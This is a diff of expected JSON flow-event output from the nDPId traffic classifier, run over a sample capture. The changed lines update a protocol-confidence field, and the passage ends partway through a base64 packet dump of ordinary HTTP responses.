00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390741,"flow_last_seen":1470104390741,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:fe9a:ec54","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104390741,"flow_last_seen":1470104390741,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:fe9a:ec54","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} -00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104426973,"flow_last_seen":1470104426973,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"17.253.26.125","src_port":123,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104377901,"flow_last_seen":1470104378954,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":52723,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.1kxun","breed":"Fun","category":"Streaming"}} 00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104388033,"flow_last_seen":1470104433040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.87","src_port":49596,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382858,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104404055,"flow_last_seen":1470104418595,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104377634,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379169,"flow_last_seen":1470104379271,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104373025,"flow_last_seen":1470104373127,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59571,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104377634,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104408049,"flow_last_seen":1470104408458,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1470104400162,"flow_last_seen":1470104408559,"flow_idle_time":200000,"flow_min_l4_payload_len":440,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":7801,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104377720,"flow_last_seen":1470104377820,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"224.0.0.252","src_port":51458,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104432630,"flow_last_seen":1470104432728,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":58468,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104427094,"flow_last_seen":1470104427094,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":55593,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382858,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"224.0.0.252","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104404055,"flow_last_seen":1470104418595,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::beee:7bff:fe0c:b3de","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104377634,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.47","dst_ip":"224.0.0.252","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104379169,"flow_last_seen":1470104379271,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104373025,"flow_last_seen":1470104373127,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.44","dst_ip":"224.0.0.252","src_port":59571,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104377634,"flow_last_seen":1470104378045,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::edf5:240a:c8c0:8312","dst_ip":"ff02::1:3","src_port":61603,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104408049,"flow_last_seen":1470104408458,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":51451,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1470104400162,"flow_last_seen":1470104408559,"flow_idle_time":200000,"flow_min_l4_payload_len":440,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":7801,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1470104377720,"flow_last_seen":1470104377820,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"224.0.0.252","src_port":51458,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104432630,"flow_last_seen":1470104432728,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":58468,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104427094,"flow_last_seen":1470104427094,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"224.0.0.252","src_port":55593,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401904,"flow_last_seen":1470104401904,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"59.120.208.212","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401904,"flow_last_seen":1470104401904,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"59.120.208.212","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104420541,"flow_last_seen":1470104420541,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":59730,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1470104400162,"flow_last_seen":1470104408559,"flow_idle_time":200000,"flow_min_l4_payload_len":448,"flow_max_l4_payload_len":528,"flow_tot_l4_payload_len":7929,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::c","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1470104420541,"flow_last_seen":1470104420541,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":59730,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1470104400162,"flow_last_seen":1470104408559,"flow_idle_time":200000,"flow_min_l4_payload_len":448,"flow_max_l4_payload_len":528,"flow_tot_l4_payload_len":7929,"flow_avg_l4_payload_len":495,"midstream":0,"thread_ts_msec":1654385128878,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::c","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 01562{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1452,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":2,"flow_last_seen":1654385129190,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":883,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":883,"pkt_l4_len":849,"thread_ts_msec":1654385129190,"pkt":"nLbQ0+MztKXvZygQCABFAANllGFAADQGPXmhdQ0dwKgCfgBQuJ6Y9X2b04t9LIAYAPA7ygAAAQEICpcQ6fy6xefXSFRUUC8xLjEgMzAxIE1vdmVkIFBlcm1hbmVudGx5DQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNToyOCBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sDQpDb250ZW50LUxlbmd0aDogMTkxDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpMb2NhdGlvbjogaHR0cDovL21lc3NhZ2VzLjFreHVuLm1vYmkvYXBpL21lc3NhZ2VzL2xpc3RGb3JZaW5nc2hpP2NsaWVudC11aWQ9ZTZkYmQzMGItM2I4NC00NGI0LTk3NTEtNjMxMTQ4YTNlZGU5Jm1pbl9pZD0wJmFjY2Vzc190b2tlbj0mX2JyYW5kPUdvb2dsZSZfbW9kZWw9c2RrX2dwaG9uZV94ODYmX292PUFuZHJvaWQxMSZfY3B1PWk2ODYmX3Jlc29sdXRpb249MTA4MCUyQzE3OTQmX3BhY2thZ2U9Y29tLnNjZW5ld2F5LmthbmthbiZfdj0yLjguMi4xJl9jaGFubmVsPTFreHVuJl9jYXJyaWVyPTMxMDI2MCZfYW5kcm9pZF9pZD1iOWUyODc3NjM1NGQyNTllJl9uZXR3b3JrPXdpZmkmX2FpZD01YWM2YTBmZi04ZDE4LTQ3YmMtYTkwMi0yODEyY2YwYzI1MWUmX3VkaWQ9ZTZkYmQzMGItM2I4NC00NGI0LTk3NTEtNjMxMTQ4YTNlZGU5JiZfY291bnRyeT1VUyZfbG9jYWxlPWVuJl89MTY1NDM4NTEyNQ0KDQo8aHRtbD4NCjxoZWFkPjx0aXRsZT4zMDEgTW92ZWQgUGVybWFuZW50bHk8L3RpdGxlPjwvaGVhZD4NCjxib2R5IGJnY29sb3I9IndoaXRlIj4NCjxjZW50ZXI+PGgxPjMwMSBNb3ZlZCBQZXJtYW5lbnRseTwvaDE+PC9jZW50ZXI+DQo8aHI+PGNlbnRlcj5vcGVucmVzdHkvMS4xMy42LjE8L2NlbnRlcj4NCjwvYm9keT4NCjwvaHRtbD4NCg=="} 04185{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":1654385129190,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2812,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2812,"pkt_l4_len":2778,"thread_ts_msec":1654385129190,"pkt":"nLbQ0+MztKXvZygQCABFAAruNTxAADQGlRWhdQ0dwKgCfgBQuI4gYNzH2G8CK4AYAPB8mQAAAQEICpcQ6mm6xefXSFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG9wZW5yZXN0eS8xLjEzLjYuMQ0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNToyOSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vanNvbjtjaGFyc2V0PXV0Zi04DQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KWC1Qb3dlcmVkLUJ5OiBQSFAvNy4xLjE3DQpDb250ZW50LUVuY29kaW5nOiBnemlwDQoNCjljNg0KH4sIAAAAAAAAA+WcXWskWRnHv0sucjWVnOc57wNBBFH2bu7N0JzXTDtJOqQ74y7L